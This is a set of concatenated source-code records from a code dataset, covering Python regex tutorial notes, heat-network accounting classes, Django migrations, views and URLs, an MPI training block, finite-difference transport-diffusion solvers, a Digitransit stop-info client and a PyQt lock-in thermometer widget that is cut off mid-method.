'^'\n#includes ALL other characters\nvowelRegex = re.compile(r'[^aeiouAEIOU]{2}')\nprint(vowelRegex.findall('RoboCop eats baby food!'))\n\n\n###############################\n# regex with begins and ends\n###############################\n#this returns a result\nmessage = 'Hello there!'\nbeginsRegex = re.compile(r'^Hello')\nprint(beginsRegex.findall(message))\n#['Hello']\n\n#this does not\nmessage = 'oh hello!'\nbeginsRegex = re.compile(r'^Hello')\nprint(beginsRegex.findall(message))\n#[]\n\n\n#Ends with uses $ instead of ^\n\n#this does not\n#this returns a result\nmessage = 'Hello! there!'\nendsRegex = re.compile(r'Hello!$')\nprint(endsRegex.findall(message))\n#[]\n\n#this returns a result\nmessage = 'oh Hello!'\nendsRegex = re.compile(r'Hello!$')\nprint(endsRegex.findall(message))\n#['Hello!']\n\n\n#can also do this with pattens and combine\n\nmessage = '12oh Hello!34'\nendsRegex = re.compile(r'^(\\d)+(\\w)+(\\s)Hello!(\\d)+$')\nprint(endsRegex.findall(message))\n#[('2', 'h', ' ', '4')]\n\n\n\n###############################\n# wildcards '.'\n###############################\nmessage = 'cat bat flat'\natRegex = re.compile(r'.at')\nprint(atRegex.findall(message))\natRegex = re.compile(r'.{1,2}at')\nprint(atRegex.findall(message))\n\n\n# '.*' means ALL characters\nmessage = 'First Name: Bob Last Name: Smith'\nnameRegex = re.compile(r'First Name: (.*) Last Name: (.*)')\nprint(nameRegex.findall(message))\n#[('Bob', 'Smith')]\n\n#Be aware of GREEDY vs NON-GREEDY\nmessage = ' Last Name: Smith>'\nnameRegex = re.compile(r'<(.*)>')\nprint(nameRegex.findall(message))\n#['First Name: Bob> Last Name: Smith']\nnameRegex = re.compile(r'<(.*?)>')\nprint(nameRegex.findall(message))\n#['First Name: Bob']\n\n#new lines '\\n' are not included in .*\nmessage = 'First Name: Bob\\nLast Name: Smith'\nnameRegex = re.compile(r'(.*)')\nprint(nameRegex.findall(message))\n['First Name: Bob', '', 'Last Name: Smith', '']\n\n#returns the full line\n#include re.DOTALL in compile object\nnameRegex = re.compile(r'(.*)', re.DOTALL)\nprint(nameRegex.findall(message))\n#['First Name: Bob\\nLast Name: Smith', '']\n\n# there are other parameters you can use like:\n# re.IGNORECASE to ignore the case sensitivity\n\n\n###############################\n# sub()\n###############################\n\n#can also use sub() for only some pieces of the targets\n\nmessage = 'Agent Alice shot Agent Bob'\nnamesRegex = re.compile(r'Agent (\\w+)')\nprint(namesRegex.findall(message))\n#['Agent Alice', 'Agent Bob']\nprint(namesRegex.sub('REDACTED', message))\n#REDACTED shot REDACTED\n\nnamesRegex = re.compile(r'Agent (\\w)\\w*')\nprint(namesRegex.sub(r'Agent \\1******', message))\n#Agent A****** shot Agent B******\n\n\n###############################\n# VERBOSE Reg expressions\n###############################\n\n#sometimes reg expressions can get really long\n#we can use verbose mode to combat this\n#this just means we use a multi line string and use comments to describe\n#need to \n\n\nre.compile('\\d\\d\\d-\\d\\d\\d-\\d\\d\\d\\d')\n\n#after verbose\n\nverbosePhoneRegex = re.compile(r''' \n \\d\\d\\d #area code\n - #dash 1\n \\d\\d\\d #digits 4-6\n - #dash 2\n \\d\\d\\d\\d #digits 8-10\n ''', re.VERBOSE) # need to include re.VERBOSE param\n\n###############################\n# RegEx multiple params usage \n###############################\n\n#separte options with | character in param 2\n#only used in the 're' module\n\nverbosePhoneRegex = re.compile(r''' \n \\d\\d\\d #area code\n - #dash 1\n \\d\\d\\d #digits 4-6\n - #dash 2\n \\d\\d\\d\\d #digits 
8-10\n ''', re.VERBOSE | re.IGNORECASE | re.DOTALL) # need to include re.VERBOSE param\n\n\n\n\n\n","sub_path":"Python/RegularExpressions.py","file_name":"RegularExpressions.py","file_ext":"py","file_size_in_byte":10167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
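One extension worth knowing that the tutorial above does not cover: named groups. This sketch reuses the same phone-number example; (?P<name>...) is standard re syntax.

import re

phoneNumRegex = re.compile(r'(?P<area>\d{3})-(?P<line>\d{3}-\d{4})')
match = phoneNumRegex.search('Call me at 415-555-1234')
print(match.group('area'))  # 415
print(match.group('line'))  # 555-1234
print(match.groupdict())    # {'area': '415', 'line': '555-1234'}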
+{"seq_id":"631309775","text":"\nclass HeatNetworks():\n '''Holds a bunch of heat networks'''\n def __init__(self, industry_consumption, residential_consumption):\n self.industrial_network = Network(industry_consumption)\n self.residential_network = Network(residential_consumption)\n self.unassigned_producers = []\n self.unassigned_heat = 0.0\n\n\n def add_producer(self, producer, heat):\n '''\n Assigns a producer to one of the networks\n\n Params:\n producer (dict[str,str]): A producer as listed in the heaters_and_chp config\n heat (float): Amount of heat produced in TJ\n '''\n if producer.network == 'residential':\n self.residential_network.add(heat)\n elif producer.network == 'industrial':\n self.industrial_network.add(heat)\n else:\n self.unassigned_producers.append(producer)\n self.unassigned_heat += heat\n\n\n def assign_flexible_producers(self):\n '''\n Generates tuples of producer, sector and the share of energy to shift to that sector\n '''\n share_for_ind, share_for_res = self.calculate_shares()\n\n for producer in self.unassigned_producers:\n yield (producer, 'residential', share_for_res)\n yield (producer, 'industrial', share_for_ind)\n\n\n def calculate_shares(self):\n '''\n Calculates the shares in which the flexible producers should be split up according to the\n deficits in the heat networks.\n When the shares can't be calculated, a 50/50 split is returned.\n\n Returns:\n (float, float): The share of flexible heat to go to industry, and the share to go to\n residential.\n '''\n if not self.unassigned_heat:\n return (0.5, 0.5)\n\n share_for_res = self.residential_network.deficit() / self.unassigned_heat\n share_for_ind = self.industrial_network.deficit() / self.unassigned_heat\n\n if share_for_res == 0.0 and share_for_ind == 0.0:\n return (0.5, 0.5)\n\n if not share_for_res + share_for_ind == 1.0:\n share_for_ind, share_for_res = HeatNetworks.warn_rescale(share_for_ind, share_for_res)\n\n return (share_for_ind, share_for_res)\n\n\n @staticmethod\n def warn_rescale(share_one, share_two):\n '''Returns a tuple of the rescaled shares (they should now sum to 1.0)'''\n print('\\033[93mUnassigned heat from flexible producers does not match heat deficit in ' +\n f'Final Consumption ({round(share_one + share_two, 2) * 100}%)\\033[0m')\n\n return (share_one / (share_one + share_two), share_two / (share_one + share_two))\n\n\nclass Network():\n '''Represents a heat network for e.g. residential or industry'''\n\n def __init__(self, heat_consumption=0.0):\n self.heat_supply = 0.0\n self.heat_consumption = heat_consumption\n\n\n def add(self, heat_supply):\n self.heat_supply += heat_supply\n\n\n def deficit(self):\n deficit = self.heat_consumption - self.heat_supply\n return deficit if deficit >= 0 else 0\n","sub_path":"tools/energy_balance_generator/etm_tools/energy_balance_operations/heat_network.py","file_name":"heat_network.py","file_ext":"py","file_size_in_byte":3104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"42464158","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='CardModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('title', models.CharField(max_length=52)),\n ('weight', models.IntegerField()),\n ],\n ),\n migrations.CreateModel(\n name='CardSubmissionModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('submission', models.ManyToManyField(to='Ranking.CardModel')),\n ],\n ),\n migrations.CreateModel(\n name='MatteModel',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=52)),\n ('description', models.CharField(max_length=240)),\n ('submissions', models.ManyToManyField(to='Ranking.CardSubmissionModel')),\n ],\n ),\n migrations.CreateModel(\n name='Themes',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=52)),\n ('description', models.CharField(max_length=240)),\n ],\n ),\n migrations.AddField(\n model_name='mattemodel',\n name='themes',\n field=models.ManyToManyField(to='Ranking.Themes'),\n ),\n ]\n","sub_path":"Neighborhoods/Ranking/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"562792304","text":"import os, glob\n\nDATA_DIR = '/home/chicm/ml/kgdata/tianchi'\n\nids = []\nfor i in range(5):\n filenames = glob.glob(DATA_DIR+'/test_subset'+str(i).zfill(2) + '/*.mhd')\n for fn in filenames:\n ids.append(fn.split('/')[-1].split('.')[0])\n\nprint(ids)\nwith open('sample_submission.csv', 'w') as f:\n header = 'seriesuid,coordX,coordY,coordZ,probablity\\n'\n f.write(header)\n for seriesuid in ids:\n line = '{},0,0,0,0.5\\n'.format(seriesuid)\n f.write(line)","sub_path":"create_tc_sample_submission.py","file_name":"create_tc_sample_submission.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"270661325","text":"from django.conf.urls import url, include\nfrom django.contrib.auth.decorators import login_required\n\nfrom apps.tenant.views import Dashboard\n\n\nurlpatterns = [\n url(r'^$', login_required(Dashboard.as_view()), name='index'),\n url(r'^cliente/', include('apps.cliente.urls', namespace='cliente')),\n url(r'^conductor/', include('apps.conductor.urls', namespace='conductor')),\n url(r'^vehiculo/', include('apps.vehiculo.urls', namespace='vehiculo')),\n url(r'^ruta/', include('apps.ruta.urls', namespace='ruta')),\n url(r'^planilla/', include('apps.planilla.urls', namespace='planilla')),\n]\n","sub_path":"scr/dashboard_urls.py","file_name":"dashboard_urls.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"598729543","text":"import time \n\nimport mpi_learn.mpi.manager as mm\nimport mpi_learn.train.model as model\n\nclass ProcBlock(object):\n \"\"\"\n This class represents a block of processes that run model training together.\n\n Attributes:\n comm_world: MPI communicator with all processes.\n Used to communicate with process 0, the coordinator\n comm_block: MPI communicator with the processes in this block.\n Rank 0 is the master, other ranks are workers.\n algo: MPI Algo object\n data: MPI Data object\n device: string indicating which device (cpu or gpu) should be used\n epochs: number of training epochs\n train_list: list of training data files\n val_list: list of validation data files\n callbacks: list of callback objects\n \"\"\"\n\n def __init__(self, comm_world, comm_block, algo, data,\n epochs, train_list, val_list, callbacks=None):\n self.comm_world = comm_world\n self.comm_block = comm_block\n self.algo = algo\n self.data = data\n self.device = device\n self.epochs = epochs\n self.train_list = train_list\n self.val_list = val_list\n self.callbacks = callbacks\n\n def wait_for_model(self):\n \"\"\"\n Blocks until the parent sends a JSON string\n indicating the model that should be trained.\n \"\"\"\n model_str = self.comm_world.Recv(source=0, tag='json') # note: will not work\n return model_str\n\n def train_model(self, model_json):\n model_builder = model.ModelFromJsonTF(self.comm_block, # note: will not work\n json_str=model_json, device_name=self.device)\n manager = mm.MPIManager(self.comm_block, self.data, self.algo, model_builder,\n self.epochs, self.train_list, self.val_list, callbacks=self.callbacks)\n if self.comm_block.Get_rank() == 0:\n histories = manager.process.train()\n print(histories)\n return histories['0']['val_loss'][-1]\n\n def send_result(self, result):\n self.comm_world.isend(result, dest=0, tag='result') # note: will not work\n\n def run(self):\n \"\"\"\n Awaits instructions from the parent to train a model.\n Then trains it and returns the loss to the parent.\n \"\"\"\n while True:\n cur_model = self.wait_for_model()\n fom = self.train_model(cur_model)\n self.send_result(fom)\n","sub_path":"proc_block.py","file_name":"proc_block.py","file_ext":"py","file_size_in_byte":2375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"156440048","text":"from django.shortcuts import render\nfrom .forms import EnseignantForm,EnseignantForm2\nfrom .models import Enseignant\n# Create your views here.\ndef enseignantF(request):\n form = EnseignantForm2(request.POST or None)\n if form.is_valid():\n form.save()\n form = EnseignantForm2\n\n context = {\n 'form': form\n }\n return render(request, 'staff/enseignantFo.html', context)\ndef detail_enseignant(request,cid):\n e=Enseignant.objects.get(pk=cid)\n context={'en':e}\n return render(request,'staff/detail.enseignant.html',context)\n","sub_path":"staff/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"172276673","text":"########## Ma323 - Projet : Equation de transport-diffusion ##############\r\n### Cyrine Grar / David Karalekian / Emmanuel Odenya / Emerick Perrin #####\r\n\r\n''' Même résolution avec une nouvelle condition initiale'''\r\n\r\n### Imports\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n## Valeurs test\r\n\r\nV = 1\r\nnu = 1/20\r\nh = 0.05\r\ntau = 0.0025\r\n'''Les deux cas que nous n'affichons pas'''\r\n#h = 0.2\r\n#tau = 0.5\r\n\r\n#h = 0.1\r\n#tau = 0.05\r\n\r\nx0 = -10\r\nxfin = 10\r\n\r\nN = int((xfin - x0)/h)\r\n\r\nc = nu*tau/h**2\r\nd = V*tau/h\r\n\r\nTmin = 0\r\nTmax = 4\r\n\r\n### Fonctions \r\n\r\ndef matriceM(a, b, c):\r\n \"\"\"Construit une matrice carrée de taille N, tridiagonale.\r\n Le coefficient sur la diagonale est a \"\"\"\r\n A = a*np.eye(N)\r\n for i in range(N-1):\r\n A[i, i+1] = b\r\n A[i+1, i] = c\r\n return A\r\n\r\n\r\ndef U0(x):\r\n res = np.exp(-(x-2)**2) + np.exp(-(x+2)**2)\r\n return res\r\n\r\n\r\n### Schéma explicite centré\r\n\r\n# Mec = matriceM(N, 1-2c, c-d/2, d/2+c)\r\n\r\nMec = matriceM(1 - 2*c, c-d/2, d/2+c)\r\n\r\ndef SolExpliciteC(h, tau, Mec):\r\n \"\"\" Dans le schéma explicite centré U_n+1 = Mec U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = Mec@U[ i , : ]\r\n un = U[ntdemi, : ]\r\n return U, T, X, un\r\n\r\n\r\nUe, Te, Xe, ue = SolExpliciteC(h, tau, Mec)\r\n\r\nplt.plot(Xe, Ue[0, :], label = 't=0', color='b')\r\nplt.plot(Xe, ue, label = 't=2', color='r')\r\nplt.plot(Xe, Ue[-1, :], label = 't=4', color='g')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Explicite centré h=0.05 tau=0.0025')\r\nplt.show()\r\n\r\n\r\n\r\n### Schéma explicite décentré amont\r\n\r\n# Med = matriceM(N, 1-2c-d, c, d+c)\r\n\r\nMed = matriceM(1 - 2*c -d, c, d+c)\r\n\r\ndef SolExpliciteD(h, tau, Med):\r\n \"\"\" Dans le schéma explicite décentré amont U_n+1 = Med U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = Med@U[ i , : ]\r\n un = U[ntdemi, : ]\r\n return U, T, X, un\r\n\r\nUed, Ted, Xed, ued = SolExpliciteD(h, tau, Mec)\r\n\r\nplt.plot(Xed, Ued[0, :], label = 't=0', color='r')\r\nplt.plot(Xed, ued, label = 't=2', color='g')\r\nplt.plot(Xed, Ued[-1, :], label='t=4', color='b')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Explicite décentré amont h=0.05 tau=0.0025')\r\nplt.show()\r\n\r\n\r\n\r\n### Schéma implicite centré\r\n\r\n# Mic = matriceM(N, 1+2c, -c+d/2, -c-d/2)\r\n\r\nMic = matriceM(1 + 2*c, -c + d/2, -c - d/2)\r\n\r\ndef SolImpliciteC(h, tau, Mic):\r\n \"\"\" Dans le schéma implicite centré Mic U_n+1 = U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = np.linalg.solve(Mic, U[ i , : ])\r\n un = U[ntdemi, : ]\r\n return U, T, X, un\r\n\r\nUi, Ti, Xi, ui = SolImpliciteC(h, tau, Mic)\r\n\r\nplt.plot(Xi, Ui[0, :], label = 't=0', color='b')\r\nplt.plot(Xi, ui, label = 't=2', color='r')\r\nplt.plot(Xi, Ui[-1, :], label = 't=4', color='g')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Implicite centré h=0.05 tau=0.0025')\r\nplt.show()\r\n\r\n\r\n\r\n### Schéma implicite 
décentré amont\r\n\r\n# Mid = matriceM(N, 1+2c+d, -c, -c-d)\r\n\r\nMid = matriceM(1 + 2*c + d, -c, -c - d)\r\n\r\ndef SolImpliciteD(h, tau, Mid):\r\n \"\"\" Dans le schéma implicite décentré amont Mid U_n+1 = U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = np.linalg.solve(Mid, U[ i , : ])\r\n un = U[ntdemi, : ]\r\n return U, T, X, un\r\n\r\nUid, Tid, Xid, uid = SolImpliciteD(h, tau, Mid)\r\n\r\nplt.plot(Xid, Uid[0, :], label = 't=0', color='r')\r\nplt.plot(Xid, uid, label = 't=2', color='g')\r\nplt.plot(Xid, Uid[-1, :], label = 't=4', color='b')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Implicite décentré amont h=0.05 tau=0.0025')\r\nplt.show()\r\n\r\n\r\n\r\n### Schéma Crank-Nicholson centré\r\n\r\n# CNcg = matriceM(N, 1+c, d/4-c/2, -c/2-d/4)\r\n# CNcd = matriceM(N, 1-c, c/2-d/4, d/4+c/2)\r\n\r\nCNcg = matriceM(1 + c, d/4 - c/2, -c/2 - d/4)\r\nCNcd = matriceM(1 - c, -d/4 + c/2, c/2 + d/4)\r\n\r\ndef SolCNc(h, tau, CNcg, CNcd):\r\n \"\"\" Dans le schéma Crank-Nicolson centré CNcg U_n+1 = CNcd U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = np.linalg.solve(CNcg, CNcd@U[ i , : ])\r\n un = U[ntdemi, : ]\r\n return U, T, X, un\r\n\r\nUcn, Tcn, Xcn, ucn = SolCNc(h, tau, CNcg, CNcd)\r\n\r\nplt.plot(Xcn, Ucn[0, :], label = 't=0', color='b')\r\nplt.plot(Xcn, ucn, label = 't=2', color='r')\r\nplt.plot(Xcn, Ucn[-1, :], label = 't=4', color='g')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Crank-Nicolson centré h=0.05 tau=0.0025')\r\nplt.show()\r\n\r\n\r\n\r\n### Schéma Crank-Nicholson décentré amont\r\n\r\n# CNdg = matriceM(N, 1+c+d/2, -c/2, -c/2-d/2)\r\n# CNdd = matriceM(N, 1-c-d/2, c/2, c/2+d/2)\r\n\r\nCN_cg = matriceM(1 + c + d/2, - c/2, -c/2 - d/2)\r\nCN_cd = matriceM(1 - c - d/2, c/2, d/2 + c/2)\r\n\r\ndef SolCNd(h, tau, CN_cg, CN_cd):\r\n \"\"\" Dans le schéma Crank-Nicolson centré CNcg U_n+1 = CNcd U_n \"\"\"\r\n ntfinal = int(Tmax/tau)\r\n ntdemi = int(ntfinal/2)\r\n X = np.linspace(-10,10,N)\r\n T = np.arange(ntfinal + 1)*tau\r\n U = np.zeros((ntfinal, N))\r\n U[0, : ] = U0(X)\r\n for i in range(ntfinal-1):\r\n U[ i+1, : ] = np.linalg.solve(CN_cg, CN_cd@U[ i , : ])\r\n ud = U[ntdemi, : ]\r\n return U, T, X, ud\r\n\r\nU_cn, T_cn, X_cn, ud_cn = SolCNd(h, tau, CN_cg, CN_cd)\r\n\r\nplt.plot(X_cn, U_cn[0, :], label = 't=0', color='r')\r\nplt.plot(X_cn, ud_cn, label = 't=2', color='g')\r\nplt.plot(X_cn, U_cn[-1, :], label = 't=4', color='b')\r\nplt.grid()\r\nplt.legend()\r\nplt.title('Crank-Nicolson décentré amont h=0.05 tau=0.0025')\r\nplt.show()\r\n","sub_path":"Projet_Ma323_Code_V4_NewConditionInit.py","file_name":"Projet_Ma323_Code_V4_NewConditionInit.py","file_ext":"py","file_size_in_byte":6151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
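The coefficient triples commented next to each matriceM call all fall out of the same finite-difference discretization of u_t + V u_x = nu u_xx. For the explicit centered scheme, with c = nu*tau/h^2 and d = V*tau/h:

\frac{U_j^{n+1}-U_j^n}{\tau} + V\,\frac{U_{j+1}^n-U_{j-1}^n}{2h} = \nu\,\frac{U_{j+1}^n-2U_j^n+U_{j-1}^n}{h^2}
\quad\Longrightarrow\quad
U_j^{n+1} = (1-2c)\,U_j^n + \Bigl(c-\tfrac{d}{2}\Bigr)U_{j+1}^n + \Bigl(c+\tfrac{d}{2}\Bigr)U_{j-1}^n

which is exactly matriceM(1 - 2*c, c-d/2, d/2+c): diagonal 1-2c, superdiagonal c-d/2, subdiagonal c+d/2. The other five matrices follow the same way from their respective schemes.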
+{"seq_id":"360869930","text":"from typing import Any, Dict, List, Optional, Sequence\nfrom digitransit.enums import Mode, RealtimeState\nimport json\nimport requests\nfrom datetime import datetime\n\nclass Stoptime:\n def __init__(self, scheduledArrival: int, realtimeArrival: int, arrivalDelay: int, scheduledDeparture: int, realtimeDeparture: int, departureDelay: int, realtime: bool, realtimeState: str, serviceDay: int, headsign: str, trip: Dict[str, Any]) -> None:\n self.scheduledArrival: datetime = datetime.fromtimestamp(serviceDay + scheduledArrival)\n self.realtimeArrival: datetime = datetime.fromtimestamp(serviceDay + realtimeArrival)\n self.arrivalDelay: int = arrivalDelay\n self.scheduledDeparture: datetime = datetime.fromtimestamp(serviceDay + scheduledDeparture)\n self.realtimeDeparture: datetime = datetime.fromtimestamp(serviceDay + realtimeDeparture)\n self.departureDelay: int = departureDelay\n self.realtime: bool = realtime\n self.realtimeState: RealtimeState = RealtimeState(realtimeState)\n self.headsign: str = headsign\n self.trip: Trip = Trip(**trip)\n\nclass Stop:\n def __init__(self, name: str, vehicleMode: str, stoptimesWithoutPatterns: Sequence[Dict[str, Any]]) -> None:\n self.name: str = name\n self.vehicleMode: Mode = Mode(vehicleMode)\n\n self.stoptimes = [Stoptime(**stoptime) for stoptime in stoptimesWithoutPatterns]\n\nclass Trip:\n def __init__(self, routeShortName: str) -> None:\n self.routeShortName: str = routeShortName\n\ndef get_stop_info(endpoint: str, stopcode: int, numberOfDepartures: Optional[int] = None) -> Stop:\n query = \"\"\"{\n stop(id: \"tampere:STOPID\") {\n name\n vehicleMode\n stoptimesWithoutPatternsNUMDEPARTS {\n scheduledArrival\n realtimeArrival\n arrivalDelay\n scheduledDeparture\n realtimeDeparture\n departureDelay\n realtime\n realtimeState\n serviceDay\n headsign\n trip {\n routeShortName\n }\n }\n }\n}\n\"\"\".replace(\"STOPID\", f\"{stopcode:04d}\").replace(\"NUMDEPARTS\", f\"(numberOfDepartures: {numberOfDepartures})\" if numberOfDepartures != None else \"\")\n\n jsonString = \"{\\\"query\\\": \" + json.dumps(query) + \"}\"\n\n response = requests.post(endpoint, jsonString, headers={\"content-type\": \"application/json\"})\n if not response.ok:\n raise RuntimeError(f\"Invalid response! Response below:\\n{response.content}\")\n\n d = json.loads(response.content)\n if d[\"data\"][\"stop\"] == None:\n raise ValueError(\"Invalid stopcode!\")\n return Stop(**d[\"data\"][\"stop\"])","sub_path":"digitransit/routing.py","file_name":"routing.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"449981122","text":"# -*- coding: utf-8 -*-\n\"\"\"\nUse the lock-in for thermometer (resistive sensor) read-out.\nOptionally, adjust sine-out amplitude to keep constant sensor excitation.\n\nCreated on Wed Dec 16 17:13:15 2015\n\n@author: wisp10\n\"\"\"\n\nimport time\n\nfrom LabWidgets.Utilities import compileUi\ncompileUi('LockinThermometerUi2')\nimport LockinThermometerUi2 as Ui\n\nimport pyqtgraph as pg\nfrom PyQt4.QtGui import QWidget, QErrorMessage, QIcon \nfrom PyQt4.QtCore import QSettings, QTimer, QString\nfrom PyQt4.Qt import Qt\n\nfrom Calibration.CalibrationDatabase import ThermometerCalIds, getThermometerCalibration\n\nfrom Visa.SR830_New import SR830\nfrom Visa.VisaInstrument import CommunicationsError\nimport os.path\n\nfrom Zmq.Zmq import ZmqPublisher, RequestReplyThreadWithBindings\nfrom Zmq.Ports import LockInPubSub, LockInRequestReply\nfrom Zmq.Subscribers import HousekeepingSubscriber\n\n#import gc\n#gc.set_debug(gc.DEBUG_LEAK)\n\n\nclass LockinThermometerWidget(Ui.Ui_Form, QWidget):\n def __init__(self, parent=None):\n super(LockinThermometerWidget, self).__init__(parent)\n self.setupUi(self)\n self.setWindowTitle('Lockin Thermometer')\n self.serverThread = None\n self.timer = None\n self.Rthermometer = float('nan')\n\n axis = pg.DateAxisItem(orientation='bottom')\n self.plot = pg.PlotWidget(axisItems={'bottom': axis})\n self.plot.setBackground('w')\n self.plot.plotItem.showGrid(x=True, y=True)\n self.plot.addLegend()\n self.verticalLayout.addWidget(self.plot)\n self.curve = pg.PlotCurveItem(name='X', symbol='o', pen='b')\n self.plot.addItem(self.curve)\n self.clearPb.clicked.connect(self.clearData)\n self.clearData()\n self.plotYAxisCombo.currentIndexChanged.connect(self.updatePlot)\n \n self.sr830 = None\n self.runPb.clicked.connect(self.run)\n self.parameterItems = [self.attenuatorGainSb, self.sourceImpedanceSb, self.driveResistanceSb, self.leadResistanceSb, self.preampGainSb, self.sensorVoltageSb]\n self.savePb.clicked.connect(self.saveParameterSet)\n self.loadPb.clicked.connect(self.loadParameterSet)\n self.deletePb.clicked.connect(self.deleteParameterSet)\n self.attenuatorAttenuationSb.valueChanged.connect(self.updateAttenuatorGain)\n self.attenuatorGainSb.valueChanged.connect(self.updateAttenuatorAttenuation)\n self.sensorVoltageIndicator.setUnit('V')\n self.sensorCurrentIndicator.setUnit('A')\n self.sensorPowerIndicator.setUnit('W')\n\n sr830 = SR830(None)\n sr830.sensitivity.populateEnumComboBox(self.minSensitivityCombo)\n \n self.loadParameterSets()\n self.restoreSettings()\n self.hkSub = HousekeepingSubscriber(parent = self)\n self.hkSub.adrResistanceReceived.connect(self.collectAdrResistance)\n self.hkSub.start()\n self.adrResistanceIndicator.setUnit(u'Ω')\n self.adrResistanceIndicator.setPrecision(5)\n self.publisher = None\n \n combo = self.calibrationCombo\n for i, calId in enumerate(ThermometerCalIds):\n try:\n cal = getThermometerCalibration(calId)\n info = cal.info\n except Exception as e:\n import warnings\n warnings.warn('Calibration %s unavailable due to exception %s' % (calId, str(e))) \n combo.addItem(calId)\n combo.setItemData(i, info, Qt.ToolTipRole)\n \n self.selectCalibration()\n combo.currentIndexChanged.connect(self.selectCalibration)\n\n def startServerThread(self, port):\n if self.serverThread is not None:\n self.serverThread.stop()\n self.serverThread.wait(1000)\n del self.serverThread\n self.serverThread = None\n self.serverThread = RequestReplyThreadWithBindings(port, parent=self)\n boundWidgets = {'adjustExcitation': 
self.adjustExcitationCb, 'sensorVoltage':self.sensorVoltageSb, 'tolerance':self.toleranceSb, 'autoRanging': self.autoRangingCb}\n for name in boundWidgets:\n self.serverThread.bindToWidget(name, boundWidgets[name])\n #logger.info('Starting server thread')\n self.serverThread.start()\n\n def selectCalibration(self):\n calId = str(self.calibrationCombo.currentText())\n self.calibration = getThermometerCalibration(calId)\n\n def collectAdrResistance(self, R):\n self.Rthermometer = R\n self.adrResistanceIndicator.setValue(R)\n \n def updateAttenuatorGain(self, v):\n sb = self.attenuatorGainSb\n block = sb.blockSignals(True)\n sb.setValue(1./v)\n sb.blockSignals(block)\n \n def updateAttenuatorAttenuation(self, v):\n sb = self.attenuatorAttenuationSb\n block = sb.blockSignals(True)\n sb.setValue(1./v)\n sb.blockSignals(block)\n \n def saveParameterSet(self):\n s = QSettings()\n s.beginGroup('ParameterSets')\n name = self.configCombo.currentText()\n s.beginGroup(name)\n s.setValue('adjustExcitation', self.adjustExcitationCb.isChecked())\n s.setValue('sensorName', self.sensorNameLe.text())\n s.setValue('sr830Visa', self.visaCombo.currentText())\n s.setValue('autoRanging', self.autoRangingCb.isChecked())\n s.setValue('minSensitivity', self.minSensitivityCombo.currentCode())\n for item in self.parameterItems:\n s.setValue(item.objectName(), item.value())\n s.endGroup()\n s.endGroup()\n \n def loadParameterSet(self):\n s = QSettings()\n name = self.configCombo.currentText()\n s.beginGroup('ParameterSets')\n if not name in s.childGroups():\n dlg = QErrorMessage(self)\n dlg.setWindowTitle('Error')\n dlg.showMessage('No saved parameters available for %s' % name)\n return\n s.beginGroup(name)\n for item in self.parameterItems:\n item.setValue(s.value(item.objectName(), item.value(), type=float))\n self.adjustExcitationCb.setChecked(s.value('adjustExcitation', False, type=bool))\n self.sensorNameLe.setText(s.value('sensorName', '', type=QString))\n 